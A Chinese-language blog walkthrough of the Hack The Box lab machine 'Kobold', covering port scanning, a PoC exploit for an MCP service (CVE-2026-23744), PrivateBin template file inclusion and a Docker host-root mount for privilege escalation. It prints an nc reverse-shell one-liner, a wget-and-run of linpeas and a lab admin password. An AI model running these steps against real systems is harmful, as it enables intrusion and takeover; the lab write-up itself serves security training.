【渗透测试】HTB Season10 Kobold 全过程wp

Kobold

信息收集

┌──(root㉿kali)-[~]
└─# nmap -A -T4 10.129.56.218
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-22 05:26 EDT
Nmap scan report for 10.129.56.218
Host is up (0.32s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 8c:45:12:36:03:61:de:0f:0b:2b:c3:9b:2a:92:59:a1 (ECDSA)
|_  256 d2:3c:bf:ed:55:4a:52:13:b5:34:d2:fb:8f:e4:93:bd (ED25519)
80/tcp  open  http     nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to https://kobold.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to https://kobold.htb/
| ssl-cert: Subject: commonName=kobold.htb
| Subject Alternative Name: DNS:kobold.htb, DNS:*.kobold.htb
| Not valid before: 2026-03-15T15:08:55
|_Not valid after:  2125-02-19T15:08:55
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|   http/1.1
|   http/1.0
|_  http/0.9
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   312.45 ms 10.10.16.1
2   179.65 ms 10.129.56.218

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.47 seconds

子域名枚举到mcp.kobold.htb

image-20260322175854385

image-20260325130325734

漏洞利用(CVE-2026-23744)

git clone https://github.com/H1sok444/CVE-2026-23744-PoC
改一下监听的ip和端口
python exploit.py mcp.kobold.htb

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20260325130723330

得到user.txt

提权

先信息收集一波

wget http://10.10.16.5/linpeas.sh && chmod 755 linpeas.sh && ./linpeas.sh

image-20260325132729750

得到了新的子域名bin

bin.kobold.htb

image-20260325132843498

https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-g2j9-g8r5-rg82

cd /privatebin-data/data
echo '<?php phpinfo();?>' > pwn.php

image-20260325134357010

image-20260325134320925

构造反连脚本
echo '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 172.17.0.1 9001 >/tmp/f");?>' > pwn4.php

tempalte=../data/pwn4

image-20260325134924020

但好像没有可以利用的

在docker下里的/srv/cfg/conf.php中

image-20260325140057203

回到mcp子域名的3552端口

image-20260325140307190

arcane/ComplexP@sswordAdmin1928

image-20260325140436102

创造一个镜像

image-20260325142613257

image-20260325141301474

image-20260325141318848

把宿主机的根目录 /,整个挂载到容器内的 /app 目录下

image-20260325141402896

然后进行创建

image-20260325142520307

posted @ 2026-03-25 14:29  dynasty_chenzi  阅读(291)  评论(0)    收藏  举报
返回顶端